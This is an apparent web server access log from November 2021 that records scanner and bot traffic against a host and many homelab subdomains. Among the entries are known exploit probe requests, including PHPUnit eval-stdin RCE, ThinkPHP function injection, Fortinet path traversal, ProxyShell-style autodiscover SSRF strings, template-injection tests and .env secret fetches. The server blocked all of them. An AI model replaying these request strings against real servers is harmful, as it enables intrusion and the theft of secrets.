"https://www.grocy.moralanimal.net/wp-login.php" [10/Nov/2021:16:58:31 +0000] 400 - - http localhost "-" [Client 122.51.162.65] [Length 154] [Gzip -] "-" "-" [10/Nov/2021:17:04:18 +0000] 444 - GET https agent.moralanimal.net "/sitecore/shell/ClientBin/Reporting/Report.ashx" [Client 194.48.199.78] [Length 0] [Gzip -] "curl/7.64.1" "-" [10/Nov/2021:17:28:47 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.94.138.57] [Length 0] [Gzip -] "-" "-" [10/Nov/2021:17:28:49 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.57] [Length 252] [Gzip -] "-" "-" [10/Nov/2021:17:28:49 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.57] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [10/Nov/2021:18:02:18 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 107.178.114.156] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [10/Nov/2021:18:04:03 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [10/Nov/2021:18:04:03 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [10/Nov/2021:18:04:03 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [10/Nov/2021:18:04:03 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [10/Nov/2021:18:04:03 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [10/Nov/2021:18:04:03 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [10/Nov/2021:18:04:18 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [10/Nov/2021:18:04:20 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [10/Nov/2021:18:04:20 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [10/Nov/2021:18:04:22 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [10/Nov/2021:18:04:23 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [10/Nov/2021:18:04:25 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [10/Nov/2021:18:04:26 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [10/Nov/2021:18:04:27 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [10/Nov/2021:18:04:28 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [10/Nov/2021:18:04:30 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [10/Nov/2021:18:04:31 +0000] 400 - POST https localhost "-" [Client 45.146.164.110] [Length 154] [Gzip -] "-" "-" [10/Nov/2021:18:04:32 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [10/Nov/2021:18:04:32 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [10/Nov/2021:18:18:24 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.83.64.170] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0" "-" [10/Nov/2021:18:37:20 +0000] 444 - GET https www.homeassistant.moralanimal.net "/wp-login.php" [Client 3.85.97.151] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" "https://www.homeassistant.moralanimal.net/wp-login.php" [10/Nov/2021:18:44:40 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.209.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [10/Nov/2021:19:07:34 +0000] 444 - GET https www.home.moralanimal.net "/wp-login.php" [Client 3.20.205.153] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" "https://www.home.moralanimal.net/wp-login.php" [10/Nov/2021:20:14:30 +0000] 444 - GET https www.hydra.moralanimal.net "/wp-login.php" [Client 3.15.206.80] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" "https://www.hydra.moralanimal.net/wp-login.php" [10/Nov/2021:20:36:29 +0000] 444 - GET https www.io.moralanimal.net "/wp-login.php" [Client 3.16.155.74] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" "https://www.io.moralanimal.net/wp-login.php" [10/Nov/2021:20:37:42 +0000] 444 - GET https www.jackett.moralanimal.net "/wp-login.php" [Client 18.190.152.141] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" "https://www.jackett.moralanimal.net/wp-login.php" [10/Nov/2021:20:52:21 +0000] 444 - GET https www.jdownloader.moralanimal.net "/wp-login.php" [Client 18.224.14.227] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" "https://www.jdownloader.moralanimal.net/wp-login.php" [10/Nov/2021:21:09:16 +0000] 400 - GET http 64.22.31.253 "/search?search_key=%7B%7B1337*1338%7D%7D" [Client 194.48.199.78] [Length 252] [Gzip -] "curl/7.64.1" "-" [10/Nov/2021:21:47:24 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.33.96.205] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [10/Nov/2021:22:30:06 +0000] 444 - GET https www.launch.moralanimal.net "/wp-login.php" [Client 3.144.1.82] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" "https://www.launch.moralanimal.net/wp-login.php" [10/Nov/2021:22:32:38 +0000] 444 - GET https www.lndshark.moralanimal.net "/wp-login.php" [Client 3.144.21.171] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" "https://www.lndshark.moralanimal.net/wp-login.php" [10/Nov/2021:22:45:29 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [10/Nov/2021:22:45:29 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [11/Nov/2021:00:40:39 +0000] 444 - GET https 64.22.31.253 "///remote/fgt_lang?lang=/../../../..//////////dev/" [Client 178.239.21.162] [Length 0] [Gzip -] "python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.41.1.el7.x86_64" "-" [11/Nov/2021:01:13:13 +0000] 444 - GET https www.mosquitto.moralanimal.net "/wp-login.php" [Client 18.190.152.141] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" "https://www.mosquitto.moralanimal.net/wp-login.php" [11/Nov/2021:01:50:18 +0000] 444 - GET https www.mylar.moralanimal.net "/wp-login.php" [Client 3.131.99.209] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" "https://www.mylar.moralanimal.net/wp-login.php" [11/Nov/2021:02:30:21 +0000] 444 - GET https www.nextcloud.moralanimal.net "/wp-login.php" [Client 3.138.155.103] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" "https://www.nextcloud.moralanimal.net/wp-login.php" [11/Nov/2021:02:33:20 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.180.143.138] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [11/Nov/2021:02:37:51 +0000] 444 - GET https www.oauth.moralanimal.net "/wp-login.php" [Client 3.137.212.246] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" "https://www.oauth.moralanimal.net/wp-login.php" [11/Nov/2021:02:47:33 +0000] 444 - GET https www.omv.moralanimal.net "/wp-login.php" [Client 18.225.6.48] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" "https://www.omv.moralanimal.net/wp-login.php" [11/Nov/2021:02:49:47 +0000] 444 - GET https www.npm.moralanimal.net "/wp-login.php" [Client 13.59.162.164] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" "https://www.npm.moralanimal.net/wp-login.php" [11/Nov/2021:03:18:09 +0000] 444 - GET https www.octoprint.moralanimal.net "/wp-login.php" [Client 3.19.56.254] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" "https://www.octoprint.moralanimal.net/wp-login.php" [11/Nov/2021:03:24:22 +0000] 444 - GET https www.opds.moralanimal.net "/wp-login.php" [Client 3.144.191.48] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" "https://www.opds.moralanimal.net/wp-login.php" [11/Nov/2021:04:08:06 +0000] 444 - GET https 64.22.31.253 "/" [Client 87.120.36.76] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36" "-" [11/Nov/2021:04:29:27 +0000] 444 - GET https www.portainer.moralanimal.net "/wp-login.php" [Client 18.117.222.199] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" "https://www.portainer.moralanimal.net/wp-login.php" [11/Nov/2021:04:39:10 +0000] 444 - GET https www.phpmyadmin.moralanimal.net "/wp-login.php" [Client 54.147.211.3] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" "https://www.phpmyadmin.moralanimal.net/wp-login.php" [11/Nov/2021:05:18:20 +0000] 400 - GET http localhost "/" [Client 185.189.182.234] [Length 154] [Gzip -] "-" "-" [11/Nov/2021:07:41:00 +0000] 444 - GET https www.agent.moralanimal.net "/wp-login.php" [Client 18.116.165.37] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" "https://www.agent.moralanimal.net/wp-login.php" [11/Nov/2021:08:58:28 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 104.161.19.53] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [11/Nov/2021:08:58:34 +0000] 444 - GET https www.auth.moralanimal.net "/wp-login.php" [Client 54.147.211.3] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" "https://www.auth.moralanimal.net/wp-login.php" [11/Nov/2021:09:35:42 +0000] 444 - GET https opds.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [11/Nov/2021:09:35:43 +0000] 444 - GET https opds.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [11/Nov/2021:09:59:25 +0000] 444 - GET https 64.22.31.253 "/" [Client 35.195.93.98] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [11/Nov/2021:10:04:34 +0000] 444 - GET https www.bitwarden.moralanimal.net "/wp-login.php" [Client 13.58.37.205] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" "https://www.bitwarden.moralanimal.net/wp-login.php" [11/Nov/2021:10:37:23 +0000] 444 - GET https 64.22.31.253 "/autodiscover/autodiscover.json?@evil.corp/ews/exchange.asmx?&Email=autodiscover/autodiscover.json%3F@evil.corp" [Client 45.155.204.227] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [11/Nov/2021:10:39:00 +0000] 444 - GET https www.books.moralanimal.net "/wp-login.php" [Client 18.118.25.165] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" "https://www.books.moralanimal.net/wp-login.php" [11/Nov/2021:10:42:17 +0000] 444 - GET https www.booksonic.moralanimal.net "/wp-login.php" [Client 3.129.69.59] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" "https://www.booksonic.moralanimal.net/wp-login.php" [11/Nov/2021:10:48:17 +0000] 444 - GET https www.bookstack.moralanimal.net "/wp-login.php" [Client 3.129.69.59] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" "https://www.bookstack.moralanimal.net/wp-login.php" [11/Nov/2021:10:50:23 +0000] 444 - GET https 64.22.31.253 "/" [Client 64.62.197.32] [Length 0] [Gzip -] "-" "-" [11/Nov/2021:11:04:56 +0000] 444 - GET https 64.22.31.253 "/" [Client 199.249.230.87] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-" [11/Nov/2021:11:05:04 +0000] 400 - - https localhost "-" [Client 51.15.76.60] [Length 154] [Gzip -] "-" "-" [11/Nov/2021:11:05:06 +0000] 444 - OPTIONS https localhost "/" [Client 185.220.100.241] [Length 0] [Gzip -] "-" "-" [11/Nov/2021:11:05:07 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 185.220.100.241] [Length 0] [Gzip -] "-" "-" [11/Nov/2021:11:05:15 +0000] 400 - - https localhost "-" [Client 185.220.100.241] [Length 154] [Gzip -] "-" "-" [11/Nov/2021:11:14:35 +0000] 444 - GET https booksonic.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [11/Nov/2021:11:14:35 +0000] 444 - GET https booksonic.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [11/Nov/2021:11:43:10 +0000] 400 - - https localhost "-" [Client 212.102.34.241] [Length 154] [Gzip -] "-" "-" [11/Nov/2021:11:44:30 +0000] 444 - GET https www.cloudcmd.moralanimal.net "/wp-login.php" [Client 18.225.6.48] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" "https://www.cloudcmd.moralanimal.net/wp-login.php" [11/Nov/2021:12:03:34 +0000] 444 - GET https 64.22.31.253 "/" [Client 71.6.199.23] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" "-" [11/Nov/2021:12:03:34 +0000] 444 - GET https 64.22.31.253 "/" [Client 71.6.199.23] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" "-" [11/Nov/2021:12:03:35 +0000] 444 - GET https 64.22.31.253 "/" [Client 71.6.199.23] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" "-" [11/Nov/2021:12:03:38 +0000] 400 - - https localhost "-" [Client 71.6.199.23] [Length 0] [Gzip -] "-" "-" [11/Nov/2021:12:03:38 +0000] 400 - - https localhost "-" [Client 71.6.199.23] [Length 0] [Gzip -] "-" "-" [11/Nov/2021:12:03:39 +0000] 400 - - https localhost "-" [Client 71.6.199.23] [Length 0] [Gzip -] "-" "-" [11/Nov/2021:12:03:42 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 71.6.199.23] [Length 0] [Gzip -] "-" "-" [11/Nov/2021:12:03:43 +0000] 444 - GET https 64.22.31.253 "/sitemap.xml" [Client 71.6.199.23] [Length 0] [Gzip -] "-" "-" [11/Nov/2021:12:03:43 +0000] 444 - GET https 64.22.31.253 "/.well-known/security.txt" [Client 71.6.199.23] [Length 0] [Gzip -] "-" "-" [11/Nov/2021:12:04:11 +0000] 444 - GET https 64.22.31.253 "/" [Client 130.211.54.158] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [11/Nov/2021:12:06:50 +0000] 444 - GET https www.cookbook.moralanimal.net "/wp-login.php" [Client 3.15.201.103] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" "https://www.cookbook.moralanimal.net/wp-login.php" [11/Nov/2021:12:12:40 +0000] 444 - GET https www.cockpit.moralanimal.net "/wp-login.php" [Client 3.144.194.243] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" "https://www.cockpit.moralanimal.net/wp-login.php" [11/Nov/2021:12:23:07 +0000] 444 - GET https www.comics.moralanimal.net "/wp-login.php" [Client 18.223.186.33] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" "https://www.comics.moralanimal.net/wp-login.php" [11/Nov/2021:12:39:07 +0000] 444 - GET https 64.22.31.253 "/autodiscover/autodiscover.json?@bofisa1.com/mapi/nspi/?&Email=autodiscover/autodiscover.json?@bofisa1.com" [Client 185.56.83.81] [Length 0] [Gzip -] "Firefox 203" "-" [11/Nov/2021:13:01:42 +0000] 400 - OPTIONS http 64.22.31.253 "/" [Client 212.102.34.232] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.16 Safari/537.36" "-" [11/Nov/2021:13:59:51 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [11/Nov/2021:13:59:51 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [11/Nov/2021:13:59:52 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [11/Nov/2021:13:59:53 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [11/Nov/2021:13:59:53 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [11/Nov/2021:13:59:54 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [11/Nov/2021:13:59:55 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [11/Nov/2021:13:59:56 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [11/Nov/2021:13:59:57 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [11/Nov/2021:13:59:58 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [11/Nov/2021:13:59:59 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [11/Nov/2021:14:00:01 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [11/Nov/2021:14:00:01 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [11/Nov/2021:14:00:04 +0000] 400 - POST https localhost "-" [Client 45.146.164.110] [Length 154] [Gzip -] "-" "-" [11/Nov/2021:14:08:01 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.210.136] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [11/Nov/2021:14:27:20 +0000] 444 - GET https whoami.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [11/Nov/2021:14:27:21 +0000] 444 - GET https whoami.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [11/Nov/2021:15:10:18 +0000] 444 - GET https www.deluge.moralanimal.net "/wp-login.php" [Client 18.222.89.58] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" "https://www.deluge.moralanimal.net/wp-login.php" [11/Nov/2021:15:59:11 +0000] 400 - GET http 64.22.31.253 "/.env" [Client 109.237.103.118] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [11/Nov/2021:15:59:12 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 109.237.103.118] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [11/Nov/2021:15:59:48 +0000] 444 - GET https www.downloader.moralanimal.net "/wp-login.php" [Client 18.224.29.12] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" "https://www.downloader.moralanimal.net/wp-login.php" [11/Nov/2021:16:42:13 +0000] 444 - GET https 64.22.31.253 "/" [Client 154.89.5.42] [Length 0] [Gzip -] "-" "-" [11/Nov/2021:16:47:32 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [11/Nov/2021:17:05:09 +0000] 444 - GET https 64.22.31.253 "/" [Client 101.36.107.222] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [11/Nov/2021:17:05:51 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.249.246.151] [Length 0] [Gzip -] 